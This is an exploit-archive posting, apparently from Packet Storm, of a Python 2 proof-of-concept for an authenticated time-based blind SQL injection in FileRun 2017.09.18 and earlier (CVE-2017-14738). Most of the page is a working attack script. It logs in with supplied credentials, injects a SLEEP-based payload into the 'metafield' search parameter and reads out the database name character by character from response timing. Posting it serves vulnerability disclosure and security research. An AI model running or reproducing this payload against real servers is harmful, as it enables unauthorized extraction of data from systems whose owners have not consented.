Exploit the possiblities

FileRun 2017.09.18 SQL Injection

FileRun 2017.09.18 SQL Injection
Posted Sep 29, 2017
Authored by SPARC

FileRun versions 2017.09.18 and below suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2017-14738
MD5 | c86e4ff3b6d491e6f2f96ae029bad38a

FileRun 2017.09.18 SQL Injection

Change Mirror Download
#!/usr/bin/env python
# Exploit Title: FileRun <=2017.09.18
# Date: September 29, 2017
# Exploit Author: SPARC
# Vendor Homepage: https://www.filerun.com/
# Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2017.09.18
# Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0
# CVE : CVE-2017-14738
#

import sys,time,urllib,urllib2,cookielib
from time import sleep

print """
#===============================================================#
| |
| ___| | |
| \___ \ __ \ _ \ __ \ __| _ \ __| _` | |
| | | | __/ | | | __/ | ( | |
| _____/ .__/ \___|_| _|\__|\___|_| \__,_| |
| _| |
| |
| FileRun <= 2017.09.18 |
| BlindSQLi Proof of Concept (Post Authentication) |
| by Spentera Research (research[at]spentera.id) |
| |
#===============================================================#
"""


host = raw_input("[*] Target IP: ")
username = raw_input("[*] Username: ")
password = raw_input("[*] Password: ")
target = 'http://%s/?module=search&section=ajax&page=grid' %(host)
delay=1
global cookie,data



def masuk(usr,pswd):
log_data = {
'username': usr,
'password': pswd
}

post_data = urllib.urlencode(log_data)
cookjar = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar))
try:
req = urllib2.Request('http://%s/?module=fileman&page=login&action=login'%(host), post_data)
content = opener.open(req)
global data,cookie
data = dict((cookie.name, cookie.value) for cookie in cookjar)
cookie = ("language=english; FileRunSID=%s"%(data['FileRunSID']))
return str(content.read())
except:
print '\n[-] Uh oh! Exploit fail.. PLEASE CHECK YOUR CREDENTIAL'
sys.exit(0)

def konek(m,n):
#borrow from SQLmap :)
query=("7) AND (SELECT * FROM (SELECT(SLEEP(%s-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),%s,1))>%s,0,1)))))wSmD) AND (8862=8862" %(delay,m,n))
values = { 'metafield': query,
'searchType': 'meta',
'keyword': 'work',
'searchPath': '/ROOT/HOME',
'path': '/ROOT/SEARCH' }

req = urllib2.Request(target, urllib.urlencode(values))
req.add_header('Cookie', cookie)
try:
starttime=time.time()
response = urllib2.urlopen(req)
endtime = time.time()
return int(endtime-starttime)

except:
print '\n[-] Uh oh! Exploit fail..'
sys.exit(0)

print "[+] Logging in to the application..."
sleep(1)
cekmasuk = masuk(username,password)
if u'success' in cekmasuk:
print "[*] Using Time-Based method with %ds delay."%int(delay)
print "[+] Starting to dump current database. This might take time.."
sys.stdout.write('[+] Target current database is: ')
sys.stdout.flush()

starttime = time.time()
for m in range(1,256):
for n in range(32,126):
wkttunggu = konek(m,n)
if (wkttunggu < delay):
sys.stdout.write(chr(n))
sys.stdout.flush()
break
endtime = time.time()
print "\n[+] Done in %d seconds" %int(endtime-starttime)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    4 Files
  • 19
    Nov 19th
    2 Files
  • 20
    Nov 20th
    9 Files
  • 21
    Nov 21st
    15 Files
  • 22
    Nov 22nd
    23 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close